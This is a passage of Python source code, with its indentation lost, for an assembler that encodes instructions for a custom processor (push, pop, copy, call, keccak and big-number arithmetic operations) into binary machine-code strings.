machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_pushf(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0000110'
machine_code_operand_o = '00000000000000000'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_popf(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0000111'
machine_code_operand_a = '0000000000000000000'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_pushm(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0001000'
machine_code_operand_o = '00000000000000000'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(13)+"b}").format(internal_labels[command[1]]) + "000"
elif(command[1][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_popm(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0001001'
machine_code_operand_a = '0000000000000000000'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(13)+"b}").format(internal_labels[command[1]]) + "000"
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_copy(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0001010'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_copyf(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0001011'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_copym(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0001100'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(13)+"b}").format(internal_labels[command[1]]) + "000"
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(13)+"b}").format(internal_labels[command[2]]) + "000"
elif(command[2][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_copya(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
if(command[1] == 'inc'):
if(command[2] == 'r'):
machine_code_intruction_type = '0011011'
elif(command[2] == 'd'):
machine_code_intruction_type = '0011001'
elif(command[2] == 's'):
machine_code_intruction_type = '0011010'
elif(command[2] == 'ds'):
machine_code_intruction_type = '0011000'
else:
error_during_assembly = True
elif(command[1] == 'dec'):
if(command[2] == 'r'):
machine_code_intruction_type = '0011111'
elif(command[2] == 'd'):
machine_code_intruction_type = '0011101'
elif(command[2] == 's'):
machine_code_intruction_type = '0011110'
elif(command[2] == 'ds'):
machine_code_intruction_type = '0011100'
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
else:
error_during_assembly = True
if(command[4] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[4]])
elif(command[4][0] == '#'):
if(command[4][1] == '('):
multiplicative_factor, constant = command[4][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[4][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
elif(command[4][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[4][3:]))
elif(command[4][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[4][3:]))
elif(command[4][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[4][3:]))
else:
error_during_assembly = True
if(command[5] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[5]])
elif(command[5][0] == '#'):
if(command[5][1] == '('):
multiplicative_factor, constant = command[5][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[5][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
elif(command[5][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[5][3:]))
elif(command[5][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[5][3:]))
elif(command[5][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[5][3:]))
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_lconstf(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0001101'
machine_code_operand_b = '0000000000000000000'
machine_code_operand_a = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_lconstm(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0001110'
machine_code_operand_b = '0000000000000000000'
machine_code_operand_a = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(13)+"b}").format(internal_labels[command[1]]) + "000"
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_call(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0001111'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1].isdigit()):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(int(command[1]))
else:
error_during_assembly = True
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels['pc'])
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print(command[1])
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_ret(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0010000'
machine_code_operand_o = '00000000000000000'
machine_code_operand_b = '0000000000000000000'
machine_code_operand_a = '0000000000000000000'
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_keccak_init(command, internal_labels, final_pass=True):
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0010010'
machine_code_operand_o = '00000000000000000'
machine_code_operand_b = '0000000000000000000'
machine_code_operand_a = '0000000000000000000'
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_keccak_go(command, internal_labels, final_pass=True):
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0010011'
machine_code_operand_o = '00000000000000000'
machine_code_operand_b = '0000000000000000000'
machine_code_operand_a = '0000000000000000000'
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_badd(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0100000'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_bsub(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0100001'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_bsmul(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0100010'
if(command[0] == 'bsmul'):
machine_code_operand_b_signed = "0"
machine_code_operand_a_signed = "0"
elif(command[0] == 'bsmuls'):
machine_code_operand_b_signed = "1"
machine_code_operand_a_signed = "1"
else:
error_during_assembly = True
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_o = "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_o = "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_o = "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[2][3:]))
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = machine_code_operand_a_signed + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[3][3:]))
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
